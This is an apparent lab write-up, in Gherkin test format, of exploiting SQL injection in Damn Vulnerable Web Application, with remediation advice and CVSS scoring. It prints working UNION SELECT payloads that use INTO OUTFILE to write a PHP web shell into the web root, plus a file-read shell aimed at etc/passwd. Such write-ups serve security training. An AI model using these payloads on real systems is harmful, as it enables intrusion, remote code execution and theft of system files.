## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Application - SQL Injection
  Location:
    http://127.0.0.1/dvwa/vulnerabilities/sqli - ID field
  Category:
    Web
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
      https://cwe.mitre.org/data/definitions/94.html
    CWE-89: Improper Neutralization of Special Elements used in a SQL Command
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
    REQ.105: https://fluidattacks.com/web/rules/105/
  Goal:
    Inject and execute arbitrary code
  Recommendation:
    Restrict directory access permissions to processes.
    Sanitize user input.

  Background:
  Hacker's software:
    | <Software name>   |  <Version> |
    | Microsoft Windows |     10     |
    | Google Chrome     |  76.0.3809 |
    | Python            |    3.7.4   |
    | Apache Web Server |    2.4.1   |
    | PHP               |    7.1.1   |
    | MySQL             |   10.4.6   |
  TOE information:
    Given I'm accessing the site through http://localhost
    When the Web and MySQL Servers are running,
    Then I will start analysis.

  Scenario: Normal use case
    Given I got to the login page,
    And I access with default credentials,
    When I get into the SQL Injection section,
    Then a field appears,
    And I can use it to get users by their IDs.

  Scenario: Static detection
    Given source code clearly is prone to SQL Injection,
    Given its core algorithm in "/vulnerabilities/sqli/sources/high.php" is
    """
    ...
    05  $id = $_SESSION[ 'id' ];
    06
    07  // Check database
    08  $query  = "SELECT first_name, last_name FROM users WHERE
    user_id = '$id' LIMIT 1;";
    ...
    """
    When an injected $id is concatenated with ' --'
    Then our SQL is still valid (which is nothing new),
    And prone to be better exploited.

  Scenario: Dynamic detection
    Given I know the site has a SQL injection vulnerability,
    When I put on the field "1' order by X -- '"
    Then an error is thrown if X is not less or equal to the column number.
    Then we can assure our attack will work (nothing new till' here).
    And we now know the number of columns.
    And I got this trick from other people in this repo. Thanks!

  Scenario: Exploitation
    Given I installed a default XAMPP installation on my machine,
    When I run it, I've not set any special permissions.
    Then this attack is replicable in every default installation.
    And I hope it serves as the basis of new ingenious attacks.
    When a SELECT statement is made,
    Then an optional INTO OUTFILE | DUMPFILE instruction can be added,
    And this instruction CREATES a file with the result set.
    """
    SELECT a,b,a+b INTO OUTFILE '/tmp/result.txt'
    """
    Then to escape our initial query, we can just use a UNION,
    And then append another SELECT statement.
    Then the whole query will look like this:
    """
    Let $id = "0' UNION SELECT 'str',2 --'"
    The query will be
    SELECT first_name, last_name FROM users WHERE user_id = '0'
     UNION SELECT 1,2 --'' LIMIT 1;
    """
    And I put user_id='0' in order for that SELECT to return an empty R.Set
    And we need to use our INTO OUTFILE clause,
    But before, lets remember SELECT lets us use literals
    And constants. So SELECT 'abcde' will return an one-row result set
    And the only row will have just one column with 'abcde' on it.
    Then let's give it a try to this:
    """
    Let $id = "0' UNION SELECT 'str',2 INTO OUTFILE 'testtest.txt'-- '"
    using the page's input field. Then submit.
    """
    And we got something exciting (evidence)[img1.png].
    And the content of the file is
    """
    01 str 2
    """
    Then we know we can put random strings on a file.
    And what if we wanted to write a file,
    But in another directory
    """
    Let $id = "0' UNION SELECT 'str',2 INTO OUTFILE
    'C:/xampp/htdocs/testtest.txt'-- '"
    using the page's input field. Then submit.
    """
    And we are able to write that directory [evidence](img2.png).
    And now, the icing on the cake.
    Given we can write on htdocs,
    And we can write arbitrary text, on arbitrary files,
    When we write PHP files,
    Then we will be able to execute any code we want.
    And we can even, thanks to the automatic tab, put identation!
    """
    Let $id = "
    0' UNION SELECT '<?php echo(hello);','?>'
     INTO OUTFILE 'C:/xampp/htdocs/test.php'-- '"
    """
    And here I write 'hello' without any quotes,
    Given I want to demonstrate PHP up to 7.1 will assume it is a literal,
    And it will evaluate as such. (evidence)[img3.png]
    And this makes this attack more resilient to mysqli_real_escape_string.

  Scenario: Extraction
    Given we have a SQLi here,
    When we use the $id param to bind other columns
    Then we could fetch sensitive information.
    But we can also, now with arbitrary code execution
    And our capacity of storing CGI files on the web server,
    Then fetch souce code. For example:
    """
    01  <?php echo file_get_contents($_GET[data]); ?>
    """
    And it would again work, and would let us fetch more resources from the FS
    Then we could open, e.g., http://127.0.0.1/test.php?data=etc%2Fpasswd

  Scenario: Remediation
    Given we are dealing with SQL Injection,
    When the sanitization of data, and param binding are done,
    Then the problem should be solved.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.5/10 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.0/10 (Medium) - CR:M/IR:L/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:L/MI:L

  Scenario: Correlations
    No correlations have been found to this date 2019-08-16
